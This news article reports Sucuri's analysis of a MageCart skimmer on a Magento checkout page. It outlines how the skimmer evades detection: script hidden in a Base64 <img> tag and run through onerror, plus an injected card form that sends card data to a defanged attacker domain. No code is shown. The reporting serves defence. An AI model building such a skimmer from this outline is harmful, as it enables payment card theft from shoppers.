Magento Credit Card Skimmer Uses ![]()
Tag to Evade Detection
A new MageCart attack targeting Magento-powered eCommerce websites has been uncovered by researchers at Sucuri, revealing a sophisticated method that hides credit card-stealing malware inside an <img> tag. This technique allows cybercriminals to exfiltrate payment data while remaining undetected by security scanners.
The attack was discovered when a client approached Sucuri, concerned that their website was infected with credit card skimming malware. According to the security analyst Kayleigh Martin, “Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.”
This particular attack relies on stealth. The malware injects malicious JavaScript inside an <img> tag, making it appear as a standard image element. “It does this by disguising malicious content inside an <img> tag, making it easy to overlook,” Martin explains.
To uncover the malware, analysts inspected the website’s checkout page and found an unusually long Base64-encoded string within an <img> tag. While Base64 encoding is often used for small embedded images, Sucuri’s investigation raised red flags: “What makes this even more suspicious is its location—on the checkout page and nowhere else on the site.”
The <img> tag also includes an onerror event, which is typically used to handle broken image loading. However, the attackers repurpose this functionality to execute malicious JavaScript instead. “The onerror event is hijacked to execute JavaScript instead of just handling the error,” the report states.
This is a clever evasion technique because browsers inherently trust <img> tags, and security tools often overlook them in scans.
Once the hidden JavaScript executes, the malware:
- Checks whether the user is on the checkout page and ensures it hasn’t already run.
- Waits for the user to submit payment details.
- Activates a function called magictrick(), which steals credit card data.
According to Sucuri, “This function is crucial, as it collects and sends sensitive user data to a remote server.”
To further avoid detection, the malware dynamically injects a malicious form into the checkout page. This form collects:
- Card Number
- Expiration Date
- CVV (Security Code)
The script also ensures that only numerical characters are accepted, removing any invalid input that could trigger suspicion.
Once the card details are captured, the malware encodes the data and sends it to wellfacing[.]com, a malicious domain controlled by the attackers. The stolen credit card information is stored and likely sold on the dark web for fraudulent transactions and identity theft.
Related Posts:
- Cyberattack on Magento: Hackers Inject Skimmer, Card Data Stolen
- Credit Card Skimmer Malware Uncovered: Targeting Magento Checkout Pages
- Magento Custom Development: Tailoring E-Commerce Solutions to Perfection
- Adobe Issues Critical Security Updates for Commerce and Magento Platforms
